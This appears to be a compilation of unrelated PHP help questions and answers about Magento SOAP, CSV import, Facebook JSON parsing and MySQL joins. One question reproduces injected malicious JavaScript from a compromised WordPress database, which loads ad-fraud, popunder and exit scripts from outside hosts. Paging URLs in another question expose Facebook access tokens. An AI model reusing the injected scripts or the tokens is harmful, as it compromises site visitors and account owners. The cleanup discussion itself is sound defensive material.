FACTS:
I am not very good at magento but have some experience working with API's using PHP.
TARGET:
What I actually want to do is
Download magento customer orders in our order system
Process the orders
Upload tracking code back to magento
Update magento products level based on the values fetched from our local Stock System running on a different server
ENVIRONMENT:
I am using a Login Plugin to make the store private so only customers with an account can access it.
PROBLEM:
IF 'AUTHENTICATION' PLUGIN IS DISABLED EVERYTHING WORKS FINE. BUT WHEN PLUGIN IS ENABLED STEP 3 AND 4 STOP WORKING.
ERROR SAMPLE:
Magento SOAP API V2 calls result in
SoapFault Object ( [message:protected] => looks like we got no XML document, when used for Private Sales store. I am able to login using API a/c,fetch orders but calls to update stock / upload tracking etc fail.
SAMPLE OUTPUT:
Login Successful [0a254c064fa033859bc75db94]
Request :
<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:Magento"><SOAP-ENV:Body><ns1:catalogInventoryStockItemUpdateRequestParam>sessionId>0a254c064fa033859bc75db94</sessionId><productId>1</productId><data><qty>100</qty><is_in_stock>1</is_in_stock></data></ns1:catalogInventoryStockItemUpdateRequestParam></SOAP-ENV:Body></SOAP-ENV:Envelope>
Result:
SoapFault Object ( [message:protected] => looks like we got no XML document [string:Exception:private] => [code:protected] => 0 [file:protected] => /var/www/vhosts/XXX/magentoAPI/stock.php [line:protected] => 31 [trace:Exception:private] => Array ( [0] => Array ( [file] => /var/www/vhosts/XXX/magentoAPI/stock.php [line] => 31 [function] => __call [class] => SoapClient [type] => -> [args] => Array ( [0] => catalogInventoryStockItemUpdate [1] => Array ( [0] => stdClass Object ( [sessionId] => 0a254c064fa033859bc75db94 [productId] => 1587 [data] => Array ( [qty] => 1000 [is_in_stock] => 1 ) ) ) ) ) [1] => Array ( [file] => /var/www/vhosts/XXX/magentoAPI/stock.php [line] => 31 [function] => catalogInventoryStockItemUpdate [class] => SoapClient [type] => -> [args] => Array ( [0] => stdClass Object ( [sessionId] => 0a254c064fa033859bc75db94 [productId] => 1587 [data] => Array ( [qty] => 1000 [is_in_stock] => 1 ) ) ) ) ) [previous:Exception:private] => [faultstring] => looks like we got no XML document [faultcode] => Client [faultcodens] => http://schemas.xmlsoap.org/soap/envelope/ )
Related
I'm trying to import a CSV File with Codeigniter, which contains the code below:
Voornaam;Achternaam;email
John;Doe;john.doe#gmail.com
Man;Made;man#made.com
The file is successfully uploaded, and when I print the code through PHP it indeed shows me the file contents in an array:
Array ( [0] => Array ( [Voornaam] => John [Achternaam] => Doe [email] => john.doe#gmail.com ) [1] => Array ( [Voornaam] => Man [Achternaam] => Made [email] => man#made.com ) )
The code is then processed through the following code:
foreach($csv_array as $row) {
$insertData = array(
'firstName' => $row['Voornaam'],
'lastName' => $row['Achternaam'],
'email' => $row['email']
);
};
Which unfortunately 'Undefined index: Voornaam' When i replace $row['Voornaam'] with '', the code processes fine, so lastName and email work. Now, I cannot for the life of me figure out why Voornaam is not processed, and how it may be fixed.
Every day or so, backdoor code gets added (injected?) to the end of all the rows in wp_posts - post_content.
Wordfence picks up only the entry cutwin and alerts me - it doesn't clean it. I've also tried other WP anti malware plugins to no effect. All I know how to do at present is neuter it by using WP search&replace on 'cutwin', replacing with 'example', then painstakingly delete the code row by row. With 113 entries in the table, this is slow. My questions are:
1) Can someone give me SQL code that I can put in phpmyadmin to quickly delete it from all rows in wp_posts - post_content? A script that found the first line (see below) and removed that and everything after would do the trick, but I don't know myself how to code it.
2) Does anyone know what's causing this and how to get rid of it?
Theme: Generatepress
Plugins in use:
Akismet Anti Spam,
Anti-Malware Security and Brute-Force Firewall,
Better Search Replace,
Elementor,
Elementor Pro,
GP Premium,
Superfly Menu,
UpdraftPlus - Backup/Restore,
Use Any Font,
Wordfence Security,
WP Crontrol,
WP Rocket,
WP Smush,
WP-Sweep
The malicious code follows.
Many thanks,
Michael
<script type="text/javascript">
var adlinkfly_url = 'https://cutwin.com/';
var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
var adlinkfly_advert = 2;
var adlinkfly_exclude_domains = ['example.com', 'yoursite.com'];
</script>
<script src='//cutwin.com/js/full-page-script.js'></script>
<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script type="text/javascript">//<![CDATA[
(function() {
var configuration = {
"token": "11f0dc1ed8453e409e04d86bea962f34",
"exitScript": {
"enabled": true
},
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
Since the cutwin script is being injected periodically the first thing I would suspect is that the malware is using a cron job to do the injection. The cron jobs are stored in the wp_options table with option_name 'cron'. Unfortunately, this is a serialized value and is very hard to read directly. However, you can create a simple PHP script to unserialize it.
<?php
require('wp-load.php');
var_dump( get_option( 'cron' ) );
?>
I would save this in the root directory (where wp-load.php is found) and run it from your browser. The ouput looks like this:
Array
(
[1522826738] => Array
(
[delete_expired_transients] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => daily
[args] => Array
(
)
[interval] => 86400
)
)
)
[1522826996] => Array
(
[wp_update_plugins] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => twicedaily
[args] => Array
(
)
[interval] => 43200
)
)
[wp_update_themes] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => twicedaily
[args] => Array
(
)
[interval] => 43200
)
)
[wp_version_check] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => twicedaily
[args] => Array
(
)
[interval] => 43200
)
)
)
[1522827110] => Array
(
[wp_scheduled_delete] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => daily
[args] => Array
(
)
[interval] => 86400
)
)
)
[1522828797] => Array
(
[wp_scheduled_auto_draft_delete] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => daily
[args] => Array
(
)
[interval] => 86400
)
)
)
where 'delete_expired_transients', 'wp_update_plugins', 'wp_update_themes', ... are the names of PHP functions to run periodically. Check that all of these functions are reasonable. If the malware programmer is skilled he/she would use something more hidden but you should check that there are no strange cron jobs.
I need the message part of the json-string below. It should be possible with this, but it isn't.
echo $fb_response['data'][0]['message'];
[VGardena] => stdClass Object
(
[data] => Array
(
[0] => stdClass Object
(
[message] => The traditional cuisine of Val Gardena - so much variety, so many different local specialities!nCome and visit us this summer at the Dolomites Market in Selva: goo.gl/6kMvsE
[story] => Val Gardena Gru00f6den added 3 new photos u2014 eating Strudel in Selva Wolkenstein.
[created_time] => 2017-04-16T17:11:00+0000
[id] => 105061549531699_1321349021236273
)
[1] => stdClass Object
(
[message] => ud83cudf37ud83cudf37ud83cudf37 Mbincion a duc na Bona Pasca! ud83cudf37ud83cudf37ud83cudf37nnu25ba Serena #Pasqua a tutti!nu25ba Wir wu00fcnschen euch allen Frohe #Ostern!nu25ba Wishing you a Happy Easter!
[story] => Val Gardena Gru00f6den celebrating Easter with Marina Demetz at Val Gardena Gru00f6den.
[created_time] => 2017-04-16T08:00:00+0000
[id] => 105061549531699_1328683843836124
)
)
[paging] => stdClass Object
(
[previous] => https://graph.facebook.com/v2.8/105061549531699/posts?limit=2&since=1492362660&access_token=EAACx6A6Hb9cBAB8tomDGj9N1FpE2xcWMVE7ad0Y2q08XUjVmGXsQ2aPCEKbX0iiRxK6M6FWYl1os3I2k5ZC1uY2cnJ1bZB2He3KTOpbwNo9KAZAzweShCUFvOt9Nfb2jZB8gHZCiO8l66dxsqdMCAbgxIlkTqJ8EZD&__paging_token=enc_AdCelydXbqb60yLCpaRWbTgLMBNNGGsZAfGqMO82Go1ZCA3ZAkSH6IS2TOBzqBSZA6SXXmltAcOE6ugchoDN3xGK1egG7qp8QtzqYD5u6YLeh9jBZAgZDZD&__previous=1
[next] => https://graph.facebook.com/v2.8/105061549531699/posts?limit=2&access_token=EAACx6A6Hb9cBAB8tomDGj9N1FpE2xcWMVE7ad0Y2q08XUjVmGXsQ2aPCEKbX0iiRxK6M6FWYl1os3I2k5ZC1uY2cnJ1bZB2He3KTOpbwNo9KAZAzweShCUFvOt9Nfb2jZB8gHZCiO8l66dxsqdMCAbgxIlkTqJ8EZD&until=1492329600&__paging_token=enc_AdBOpmW5OIQydpreytQ0eoWAdD9grbpMpB3XrkTTJL493qrDlacQCGVrn23ZBdZCKqgLxijwuQEnq5E1mwFaeiG2jRqdBvJmN2c7qu5UJQvIDnZBwZDZD
)
)
It should be possible with this, but it isn't.
No it shouldn’t, because you have an object here inside data, and not an array. (And data itself is also the property of an object.)
Object properties are accessed via -> in PHP.
$foo['VGardena']->data[0]->message
I have a little problem.
There are two tables in my database: users and classes. The first one contains info about users, and the second one - about user classes and about access rights.
Now I'm extracting all data from there using this:
SELECT * FROM users NATURAL JOIN classes WHERE users.ID_User = '$id';
The mysql code works and returns a right array.
Now, when I'm doing next:
<?php
$result = mysql_query($sql_above);
$row = mysql_fetch_array($result);
print_r($row);
?>
... i'm getting this:
Array ( [0] => 1 [ID_User] => 1 [1] => John [Name] => John [2] => Doe [Surname] => Doe [3] => ... [16] => Owner [Class] => Owner [17] => [All] => [18] => [CanAuth] => [19] => [CanViewData] => [20] => [CanAddData] => [21] => [CanAlterData] => [22] => [CanDeactivateData] => [23] => [CanDeleteData] => [24] => [CanMgLocatari] => ... )
Columns from 17 till the end are access rights, noted in the database by 1 or 0. And there, they're missing.
Is there any option to enable in PHP configuration to correct this thing? Because on a Windows machine, the code executes properly and rights are working.
PHP Version 5.3.6-13ubuntu3.7 | Apache/2.2.20 (Ubuntu) | MySQL client version: 5.1.62
Please, reply. Thanks!
I'm performing a simple query that joins two tables together. What I get is something like this.
array(
[0] => array(
'id' => 52
'name' => 'charles',
'sale_id' => 921,
'sale_time' => 1306393996,
'sale_price' => 54.21
),
[1] => array(
'id' => 52
'name' => 'charles',
'sale_id' => 922,
'sale_time' => 1306395000,
'sale_price' => 32.41
),
...
);
...which is the expected result. However, I'd like the query to return something like this:
array(
[0] => array(
'id' => 52,
'name' => 'charles',
'sales' => array(
[0] => array(
'sale_id' => 921,
'sale_time' => 1306393996,
'sale_price' => 54.21
),
[1] => array(
'sale_id' => 922,
'sale_time' => 1306395000,
'sale_price' => 32.41
),
...
)
)
)
Now I realize I could simply perform two queries, one for the user info, and another for sales, and merge those arrays together using whatever language I'm using (PHP in this case). But I have many arrays of properties and querying and merging for those seems awfully inelegant to me (although it does work). It seems to me there'd be a way to work with a single, unified object without duplicating data.
Just wondering if there was a no-brainer query, or if that's simply not easy through MySQL alone.
I would say this is not possible with MySQL alone - you have to do some tricks at application level. That is, because even if you send a single query that will bring you all the data from MySQL to your application (PHP), they will come as a denormalized array of data - your first case.
If you want to get the data as in your second case, I'd recommend using some ORM - in Ruby there is ActiveRecord, in Perl there are Class::DBi, DBIx::Class and many more - I can not name one for PHP that is able to do this, but I am sure there are plenty.